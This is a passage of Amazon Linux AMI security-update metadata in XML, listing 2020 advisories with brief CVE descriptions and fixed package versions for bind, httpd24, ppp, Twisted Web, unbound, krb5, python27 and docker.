arch="x86_64"><filename>Packages/php73-snmp-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.17" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.17-1.25.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.17-1.25.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.17" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.17-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1369</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1369: important priority package update for bind</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8617:
Using a specially-crafted message, an attacker may potentially cause a BIND server to reach an inconsistent state if the attacker knows (or successfully guesses) the name of a TSIG key used by the server. Since BIND, by default, configures a local session key even on servers whose configuration does not otherwise make use of it, almost all current BIND servers are vulnerable. In releases of BIND dating from March 2018 and after, an assertion check in tsig.c detects this inconsistent state and deliberately exits. Prior to the introduction of the check the server would continue operating in an inconsistent state, with potentially harmful results.
An assertion failure was found in BIND, which checks the validity of messages containing TSIG resource records. This flaw allows an attacker that knows or successfully guesses the name of the TSIG key used by the server to use a specially-crafted message, potentially causing a BIND server to reach an inconsistent state or cause a denial of service. A majority of BIND servers have an internally-generated TSIG session key whose name is trivially guessable, and that key exposes the vulnerability unless specifically disabled.
1836124: CVE-2020-8617 bind: A logic error in code which checks TSIG validity can be used to trigger an assertion failure in tsig.c
CVE-2020-8616:
A malicious actor who intentionally exploits this lack of effective limitation on the number of fetches performed when processing referrals can, through the use of specially crafted referrals, cause a recursing server to issue a very large number of fetches in an attempt to process the referral. This has at least two potential effects: The performance of the recursing server can potentially be degraded by the additional work required to perform these fetches, and The attacker can exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor.
A flaw was found in BIND, where it does not sufficiently limit the number of fetches that can be performed while processing a referral response. This flaw allows an attacker to cause a denial of service attack. The attacker can also exploit this behavior to use the recursing server as a reflector in a reflection attack with a high amplification factor.
1836118: CVE-2020-8616 bind: BIND does not sufficiently limit the number of fetches performed when processing referrals
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8616" title="" id="CVE-2020-8616" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8617" title="" id="CVE-2020-8617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.64.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.64.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.64.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1370</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1370: low priority package update for httpd24</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:18:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-1934:
In Apache HTTP Server 2.4.0 to 2.4.41, mod_proxy_ftp may use uninitialized memory when proxying to a malicious FTP server.
1820772: CVE-2020-1934 httpd: mod_proxy_ftp use of uninitialized value
CVE-2020-1927:
In Apache HTTP Server 2.4.0 to 2.4.41, redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an an unexpected URL within the request URL.
1820761: CVE-2020-1927 httpd: mod_rewrite configurations vulnerable to open redirect
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1927" title="" id="CVE-2020-1927" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1934" title="" id="CVE-2020-1934" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_proxy_html" version="2.4.43" release="1.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.43" release="1.89.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.43" release="1.89.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.43-1.89.amzn1.noarch.rpm</filename></package><package name="mod24_ldap" version="2.4.43" release="1.89.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.43-1.89.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.43" release="1.89.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.43" release="1.89.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.43-1.89.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.43" release="1.89.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.43-1.89.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1371</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1371: important priority package update for ppp</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8597:
eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.
1800727: CVE-2020-8597 ppp: Buffer overflow in the eap_request and eap_response functions in eap.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8597" title="" id="CVE-2020-8597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ppp" version="2.4.5" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-2.4.5-11.9.amzn1.x86_64.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-devel-2.4.5-11.9.amzn1.x86_64.rpm</filename></package><package name="ppp-debuginfo" version="2.4.5" release="11.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/ppp-debuginfo-2.4.5-11.9.amzn1.x86_64.rpm</filename></package><package name="ppp-debuginfo" version="2.4.5" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-debuginfo-2.4.5-11.9.amzn1.i686.rpm</filename></package><package name="ppp" version="2.4.5" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-2.4.5-11.9.amzn1.i686.rpm</filename></package><package name="ppp-devel" version="2.4.5" release="11.9.amzn1" epoch="0" arch="i686"><filename>Packages/ppp-devel-2.4.5-11.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1372</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1372: important priority package update for python-twisted-web</title><issued date="2020-05-22 20:57:00" /><updated date="2020-06-03 17:20:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-10108:
In Twisted Web through 19.10.0, there was an HTTP request splitting vulnerability. When presented with two content-length headers, it ignored the first header. When the second content-length value was set to zero, the request body was interpreted as a pipelined request.
1813439: CVE-2020-10108 python-twisted: HTTP request smuggling when presented with two Content-Length headers
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10108" title="" id="CVE-2020-10108" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-web-8.2.0-6.6.amzn1.x86_64.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-web-8.2.0-6.6.amzn1.x86_64.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-web-8.2.0-6.6.amzn1.i686.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="6.6.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-web-8.2.0-6.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1373</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1373: important priority package update for unbound</title><issued date="2020-05-22 20:58:00" /><updated date="2020-06-03 17:22:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-12663:
Unbound before 1.10.1 has an infinite loop via malformed DNS answers received from upstream servers.
No description is available for this CVE.
99999:
CVE-2020-12663 unbound: infinite loop via malformed DNS answers received from upstream servers
1837604: CVE-2020-12663 unbound: infinite loop via malformed DNS answers received from upstream servers
CVE-2020-12662:
Unbound before 1.10.1 has Insufficient Control of Network Message Volume, aka an "NXNSAttack" issue. This is triggered by random subdomains in the NSDNAME in NS records.
No description is available for this CVE.
99999:
CVE-2020-12662 unbound: insufficient control of network message volume leads to DoS
1837597: CVE-2020-12662 unbound: amplification of an incoming query into a large number of queries directed to a target
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12662" title="" id="CVE-2020-12662" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12663" title="" id="CVE-2020-12663" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="unbound-devel" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-devel-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-debuginfo-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-libs-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-python-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound" version="1.6.6" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/unbound-1.6.6-1.5.amzn1.x86_64.rpm</filename></package><package name="unbound" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-libs" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-libs-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-debuginfo" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-debuginfo-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-devel" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-devel-1.6.6-1.5.amzn1.i686.rpm</filename></package><package name="unbound-python" version="1.6.6" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/unbound-python-1.6.6-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1374</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1374: medium priority package update for krb5</title><issued date="2020-05-22 20:58:00" /><updated date="2020-06-03 17:22:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20217:
A Reachable Assertion issue was discovered in the KDC in MIT Kerberos 5 (aka krb5) before 1.17. If an attacker can obtain a krbtgt ticket using an older encryption type (single-DES, triple-DES, or RC4), the attacker can crash the KDC by making an S4U2Self request.
1665296: CVE-2018-20217 krb5: Reachable assertion in the KDC using S4U2Self requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20217" title="" id="CVE-2018-20217" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="krb5-workstation" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="libkadm5" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/libkadm5-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.48.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.15.1-46.48.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-devel" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="libkadm5" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/libkadm5-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.15.1-46.48.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.15.1" release="46.48.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.15.1-46.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1375</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1375: medium priority package update for python27</title><issued date="2020-05-22 20:58:00" /><updated date="2020-08-31 21:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18348:
An issue was discovered in urllib2 in Python 2.x through 2.7.17 and urllib in Python 3.x through 3.8.0. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the host component of a URL) followed by an HTTP header. This is similar to the CVE-2019-9740 query string issue and the CVE-2019-9947 path string issue. (This is not exploitable when glibc has CVE-2016-10739 fixed.)
1727276: CVE-2019-18348 python: CRLF injection via the host part of the url passed to urlopen()
CVE-2018-20852:
http.cookiejar.DefaultPolicy.domain_return_ok in Lib/http/cookiejar.py in Python before 3.7.3 does not correctly validate the domain: it can be tricked into sending existing cookies to the wrong server. An attacker may abuse this flaw by using a server with a hostname that has another valid hostname as a suffix (e.g., pythonicexample.com to steal cookies for example.com). When a program uses http.cookiejar.DefaultPolicy and tries to do an HTTP connection to an attacker-controlled server, existing cookies can be leaked to the attacker. This affects 2.x through 2.7.16, 3.x before 3.4.10, 3.5.x before 3.5.7, 3.6.x before 3.6.9, and 3.7.x before 3.7.3.
1740347: CVE-2018-20852 python: Cookie domain check returns incorrect results
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20852" title="" id="CVE-2018-20852" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18348" title="" id="CVE-2019-18348" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-devel" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.137.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-1.137.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-1.137.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="1.137.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-1.137.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2020-1376</id><title>Amazon Linux AMI 2014.03 - ALAS-2020-1376: important priority package update for docker</title><issued date="2020-05-29 21:52:00" /><updated date="2020-06-03 17:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-13401:
99999:
